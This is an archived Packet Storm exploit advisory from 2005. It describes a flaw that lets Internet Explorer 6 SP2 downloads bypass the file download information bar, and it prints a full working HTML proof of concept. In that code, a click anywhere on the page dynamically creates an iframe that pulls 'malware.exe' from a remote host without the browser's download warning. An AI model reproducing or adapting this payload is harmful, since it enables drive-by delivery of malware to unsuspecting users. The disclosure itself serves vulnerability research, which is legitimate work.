exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ieBarBypass.txt

ieBarBypass.txt
Posted Jan 16, 2005
Authored by Rafel Ivgi | Site theinsider.deep-ice.com

Microsoft Internet Explorer 6 is susceptible to a flaw that allows for malicious file download via manipulation of the File Download Information bar functionality.

tags | exploit
SHA-256 | 9819de7846ae70cadf20f378c91cc61117a83847a9ab9ea1767507c8b371ec78

ieBarBypass.txt

Change Mirror Download
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application: Internet Explorer
Vendors: http://www.microsoft.com
Versions: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158
Patched With: SP2;
Platforms: Windows
Bug: Remote File Download Information Bar Bypass
Exploitation: Remote with browser
Date: 13 Jan 2005
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Internet Explorer is currently the most common internet browser in the world.
Microsoft Windows XP Service Pack 2 was designed to block any file download
by an information bar which must be clicked and selected with "Download File".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

While trying to download a file Microsoft Internet Explorer
the user gets the information bar. The information bar
mechanism blocks/catches all references to download-able files,
even through javascripts and HTML Event properties.
However Microsoft's Internet Explorer (SP2) DOES NOT CATCH
"body" tag with the HTML "onclick" event which dynamically
created "iframe" tags. For a good, more complicated dynamic
object creation i used the "createElement" function.
This way an attacker can make a user download a file with him just
clicking anywhere on the page (not on an hyperlink).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Paste into an htm/html file and add "<" at the begining of each line:
------------------------ cut here --------------------------------------
!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
!-- saved from url=(0031)http://theinsider.deep-ice.com/ -->
HTML><HEAD><TITLE>The-Insider http://theinsider.deep-ice.com</TITLE>
META http-equiv=expires content="01 Jan 1998 01:01:00 GMT">
META http-equiv=Content-Type content="text/html; charset=windows-1252">
META http-equiv=Content-Language content=en-us>
META content=True name=HandheldFriendly>
META content="MSHTML 6.00.2900.2523" name=GENERATOR></HEAD>

embed>
body onclick='a=document.createElement("\<iframe src=\"http:\/

\/theinsider.deep-

ice.com\/malware.exe\"\>\<\/iframe\>");document.body.appendChild

(a);setTimeout("document.execCommand\(\"refresh\")",1000)'>
cebter><br><br><br><br><br><br>Click AnyWhere You Want</center>
/BODY></HTML>
------------------------ cut here --------------------------------------

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."
--
___________________________________________________________
Sign-up for Ads Free at Mail.com
http://promo.mail.com/adsfreejump.htm


Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    12 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close